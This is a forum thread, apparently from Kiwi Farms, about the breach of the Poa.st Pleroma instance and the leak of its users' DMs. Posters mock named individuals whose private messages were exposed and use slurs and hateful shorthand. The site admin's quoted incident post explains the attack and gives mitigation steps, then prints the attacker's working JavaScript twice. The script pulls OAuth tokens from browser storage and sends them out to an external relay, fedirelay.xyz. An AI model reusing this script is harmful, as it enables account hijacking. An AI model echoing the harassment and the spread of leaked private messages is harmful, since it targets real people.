- Joined
- Jan 28, 2021
Finally. Undeniable proof that the troons attacking the farms are just antisemitic.
Poa.st / Chudbuds.lol General Discussion Thread - !! Poa.st and Bae.st have been compromised, all direct messages have been leaked. !!
- Thread starter AltisticRight
- Start date
-
🐕 I am attempting to get the site runnning as fast as possible. If you are experiencing slow page load times, please report it.
Daniel Wallace
kiwifarms.net
- Joined
- Dec 9, 2021
Yeah, could you imagine?
Broken Hands
kiwifarms.net
- Joined
- Feb 3, 2023
lol, that retard's messages alone are proof that the ban wasn't an accident.
- Joined
- Feb 6, 2021
Say, wasn't that also when the hackers changed everybody's PFPs to the Poast logo in an obvious attempt to frame them?
- Joined
- Dec 24, 2018
I think a similar attack was executed in 2019, and we all had our IP addresses leaked.
- Joined
- Jul 4, 2022
Surprisingly, there seem to be quite a few ladies on Poast. Moids, lets see what your future based tradwife might look like:
Bachelorette #1 has spent a decade searching for the perfect racist sex pervert to call her husband:
Bachelorette #2 only requires that you pass the high bar of being less autistic about reading signals than Flamenco (FLAMENCO!):
Bachelorette #3 is a pedophile
I left Elaine off because while I expected funny shit of her acting as tard commander of a legion of simps, psycho Poast people treated her like the resident autistic to torment and it was honestly pretty sad to read.
Though I did laugh at this (re: Null)
Finally, I realized after all this time who graf reminds me of:
Bachelorette #1 has spent a decade searching for the perfect racist sex pervert to call her husband:
Bachelorette #2 only requires that you pass the high bar of being less autistic about reading signals than Flamenco (FLAMENCO!):
Bachelorette #3 is a pedophile
I left Elaine off because while I expected funny shit of her acting as tard commander of a legion of simps, psycho Poast people treated her like the resident autistic to torment and it was honestly pretty sad to read.
Though I did laugh at this (re: Null)
Finally, I realized after all this time who graf reminds me of:
- Joined
- Oct 6, 2021
Claude Sigma
kiwifarms.net
- Joined
- Jan 6, 2021
I just read all the Wormwood logs, turns out he's just a great guy. I like him even more now.
Nothing that interesting, but here are a few chunks of deep Wormwood lore for those interested.
Punished Wormwood. Condemned to make racist comics online until death ensue.
Special kid Wormwood, they tried to contain his Vril ever since childhood.
No one knows how to behave around Graf it seems.
TND
Based Wormwood, keeping good OpSec even with whamen.
Based Wormwood, refusing pornography ever when offered directly.
Based Wormwood, refusing pornography even when it's... uh... homosexual.
We've all been there fren. Reminder to homeschool your children.
Nothing that interesting, but here are a few chunks of deep Wormwood lore for those interested.
Punished Wormwood. Condemned to make racist comics online until death ensue.
Special kid Wormwood, they tried to contain his Vril ever since childhood.
No one knows how to behave around Graf it seems.
TND
Based Wormwood, keeping good OpSec even with whamen.
Based Wormwood, refusing pornography ever when offered directly.
Based Wormwood, refusing pornography even when it's... uh... homosexual.
We've all been there fren. Reminder to homeschool your children.
petra
kiwifarms.net
- Joined
- Apr 9, 2021
I am seeing ponypanda interacting with several poa.st people right now, so this doesn't seem likely
- Joined
- Apr 8, 2018
Yeah Graf went later and said that there was something screwing up.
- Joined
- Jan 16, 2021
Reading this makes me appreciate our Beauty Parlor ladies more.
- Joined
- May 16, 2019
We're getting blamed, yet again.
I have no idea what he's talking about, and none of the actual tech guys/admins have said something like this.
I have no idea what he's talking about, and none of the actual tech guys/admins have said something like this.
Passing Through Town
kiwifarms.net
- Joined
- Aug 2, 2021
They are. User-deleted accounts that were deleted prior to the time Graf gave for the breach are present in the DM leaks.
- Joined
- Jul 7, 2015
Last edited:
- Joined
- Apr 17, 2019
So users that deleted their account prior to last week and didn't have any DMs aren't present in any of the leaks?
Passing Through Town
kiwifarms.net
- Joined
- Aug 2, 2021
I can't speak for people who didn't have any DMs, but despite having deleted months ago my DMs are in the leaks. My email isn't present, however.
KillerSwallow
kiwifarms.net
- Joined
- May 30, 2019
Dunno if somebody mentioned this already but Graf definitely did NOT reset everyone's passwords. I just logged in into my account from September and cookies just did their thing. Josh did the minimal a while back and made everyone reset their shit on here, but that's apparently too much for Graf in his little kingdom.
- Joined
- Apr 8, 2018
Graf explains what happened
His responses to people's responses
long thread of somewhat cope/schizo poasts
anime graf mays 
@graf
hey friends,
on may 19, 2023 an unknown user registered the domain name fedirelay.xyz and setup a fake mostr (nostr) relay to listen for requests on the fediverse.
on may 20, 2023 at 20:52 (utc) a user uploaded the attached document to poast. it was originally an obfuscated javascript file (unobfuscated and attached it here, renamed to .txt so you can view it in any editor).
what this javascript file does is take the viewers oauth token, encode it to make it look like a nostr pubkey and then forced the clandestine mostr relay to look up that user locally giving that server the encoded token all while appearing to be a legitimate mostr (nostr) bridge
i have taken steps to completely limit access to the admin api and corrected any CSP or other issues that could possibly have contributed to this, however most of you (instance owners) are still vulnerable to it. the default pleroma install serves media files on your root domain as a local folder (i.e. yourdomain.xyz/media) and the default CSP for any site is to allow executing scripts via the root domain. in order to prevent this you should take steps to either move your media from yourdomain.xyz/media to media.yourdomain.xyz (or any subdomain outside of your root domain) or perhaps by limiting the CSP for that subdirectory via nginx configuration.
if you are an instance owner, the obfuscated file hash is `b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117` so you can search yourdomain.xyz/media/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js and see if you have it on your server.
no user password or anything beyond email:user and your chats and media associated with them have been archived and everybody's tokens were dropped forcing you to all relog on your accounts. this is to ensure that if any of you had tokens exposed by viewing this JavaScript, they are no longer functional on poast.
sorry to anybody i let down but i could never have foreseen this level of sophistication and i would not have ever expected it. now that we are aware of it, we will be more diligent in the future. thanks for being here with us still friends
@graf
hey friends,
on may 19, 2023 an unknown user registered the domain name fedirelay.xyz and setup a fake mostr (nostr) relay to listen for requests on the fediverse.
on may 20, 2023 at 20:52 (utc) a user uploaded the attached document to poast. it was originally an obfuscated javascript file (unobfuscated and attached it here, renamed to .txt so you can view it in any editor).
what this javascript file does is take the viewers oauth token, encode it to make it look like a nostr pubkey and then forced the clandestine mostr relay to look up that user locally giving that server the encoded token all while appearing to be a legitimate mostr (nostr) bridge
i have taken steps to completely limit access to the admin api and corrected any CSP or other issues that could possibly have contributed to this, however most of you (instance owners) are still vulnerable to it. the default pleroma install serves media files on your root domain as a local folder (i.e. yourdomain.xyz/media) and the default CSP for any site is to allow executing scripts via the root domain. in order to prevent this you should take steps to either move your media from yourdomain.xyz/media to media.yourdomain.xyz (or any subdomain outside of your root domain) or perhaps by limiting the CSP for that subdirectory via nginx configuration.
if you are an instance owner, the obfuscated file hash is `b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117` so you can search yourdomain.xyz/media/b2977f2d97f598d2ebd6dcf37afd9047b5da2b6dc95a7b2824fb111c906fb117.js and see if you have it on your server.
no user password or anything beyond email:user and your chats and media associated with them have been archived and everybody's tokens were dropped forcing you to all relog on your accounts. this is to ensure that if any of you had tokens exposed by viewing this JavaScript, they are no longer functional on poast.
sorry to anybody i let down but i could never have foreseen this level of sophistication and i would not have ever expected it. now that we are aware of it, we will be more diligent in the future. thanks for being here with us still friends
async function send(token, userToken, lastLoginName) {
function generateTable() {
var temp,
table = [];
for (var i = 0; i < 256; i++) {
temp = i;
for (var j = 0; j < 8; j++) {
temp = temp & 1 ? 3988292384 ^ (temp >>> 1) : temp >>> 1;
}
table = temp;
}
return table;
}
function hash(str) {
var table = generateTable(),
result = 0 ^ -1;
for (var i = 0; i < str.length; i++) {
result = (result >>>
^ table[(result ^ str.charCodeAt(i)) & 255];
}
return ((result ^ -1) >>> 0).toString(16);
}
let acct = token
.split('')
.map((char) => char.charCodeAt(0).toString(16).padStart(2, '0'))
.join('') + hash(lastLoginName).slice(0, 4);
await fetch(
'https://' +
window.location.hostname +
'/api/v1/accounts/lookup?acct=' +
acct +
'%40mostr.fedirelay.xyz',
{
credentials: 'include',
headers: {
Accept: 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/json',
Authorization: 'Bearer ' + userToken,
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
},
referrer: 'https://' +
window.location.hostname +
'/' +
acct +
'@' +
window.location.hostname,
method: 'GET',
mode: 'cors',
},
);
await fetch(
'https://' +
window.location.hostname +
'/api/v1/accounts/' +
acct +
'@mostr.fedirelay.xyz',
{
credentials: 'include',
headers: {
Accept: 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/json',
Authorization: 'Bearer ' + userToken,
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
},
referrer: 'https://' +
window.location.hostname +
'/' +
acct +
'@' +
window.location.hostname,
method: 'GET',
mode: 'cors',
},
);
}
(async function () {
let auth = JSON.parse(localStorage.getItem('localforage/vuex-lz'));
if (auth == undefined) {
const openRequest = window.indexedDB.open('localforage', 2);
openRequest.onsuccess = async (e) => {
let db = openRequest.result;
const transaction = db.transaction(['keyvaluepairs'], 'readwrite');
let keyvaluepairs = transaction.objectStore('keyvaluepairs');
let request = keyvaluepairs.get('vuex-lz');
request.onsuccess = async (e) => {
auth = request.result;
let lastLoginName = auth?.users?.lastLoginName;
let userToken = auth?.oauth?.userToken;
let token = '';
token += auth?.oauth?.userToken;
await send(token, userToken, lastLoginName);
};
};
return;
}
let lastLoginName = auth?.users?.lastLoginName;
let userToken = auth?.oauth?.userToken;
let token = '';
token += auth?.oauth?.userToken;
await send(token, userToken, lastLoginName);
})();
function generateTable() {
var temp,
table = [];
for (var i = 0; i < 256; i++) {
temp = i;
for (var j = 0; j < 8; j++) {
temp = temp & 1 ? 3988292384 ^ (temp >>> 1) : temp >>> 1;
}
table = temp;
}
return table;
}
function hash(str) {
var table = generateTable(),
result = 0 ^ -1;
for (var i = 0; i < str.length; i++) {
result = (result >>>
^ table[(result ^ str.charCodeAt(i)) & 255];}
return ((result ^ -1) >>> 0).toString(16);
}
let acct = token
.split('')
.map((char) => char.charCodeAt(0).toString(16).padStart(2, '0'))
.join('') + hash(lastLoginName).slice(0, 4);
await fetch(
'https://' +
window.location.hostname +
'/api/v1/accounts/lookup?acct=' +
acct +
'%40mostr.fedirelay.xyz',
{
credentials: 'include',
headers: {
Accept: 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/json',
Authorization: 'Bearer ' + userToken,
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
},
referrer: 'https://' +
window.location.hostname +
'/' +
acct +
'@' +
window.location.hostname,
method: 'GET',
mode: 'cors',
},
);
await fetch(
'https://' +
window.location.hostname +
'/api/v1/accounts/' +
acct +
'@mostr.fedirelay.xyz',
{
credentials: 'include',
headers: {
Accept: 'application/json',
'Accept-Language': 'en-US,en;q=0.5',
'Content-Type': 'application/json',
Authorization: 'Bearer ' + userToken,
'Sec-Fetch-Dest': 'empty',
'Sec-Fetch-Mode': 'cors',
'Sec-Fetch-Site': 'same-origin',
},
referrer: 'https://' +
window.location.hostname +
'/' +
acct +
'@' +
window.location.hostname,
method: 'GET',
mode: 'cors',
},
);
}
(async function () {
let auth = JSON.parse(localStorage.getItem('localforage/vuex-lz'));
if (auth == undefined) {
const openRequest = window.indexedDB.open('localforage', 2);
openRequest.onsuccess = async (e) => {
let db = openRequest.result;
const transaction = db.transaction(['keyvaluepairs'], 'readwrite');
let keyvaluepairs = transaction.objectStore('keyvaluepairs');
let request = keyvaluepairs.get('vuex-lz');
request.onsuccess = async (e) => {
auth = request.result;
let lastLoginName = auth?.users?.lastLoginName;
let userToken = auth?.oauth?.userToken;
let token = '';
token += auth?.oauth?.userToken;
await send(token, userToken, lastLoginName);
};
};
return;
}
let lastLoginName = auth?.users?.lastLoginName;
let userToken = auth?.oauth?.userToken;
let token = '';
token += auth?.oauth?.userToken;
await send(token, userToken, lastLoginName);
})();
His responses to people's responses
long thread of somewhat cope/schizo poasts
Attachments
- Joined
- Jun 12, 2021
You just haven't seen their DMs yet.
KneeLengthCock
kiwifarms.net
- Joined
- Apr 14, 2023
Weird thing, rabies gives men epic priapism. Just a raging hard on. A good novel on the subject is Rant, by Chuck Palahnuik, same dude that did Fight Club. Nice story about time travel, rape, incest and inbreeding, and of course, fucking on rabies. All the nice, heartwarming themes one would expect from a writer from Portland.
Anyhow, got off topic there. Bug Chasers are degenerates and deserve the inquisition treatment.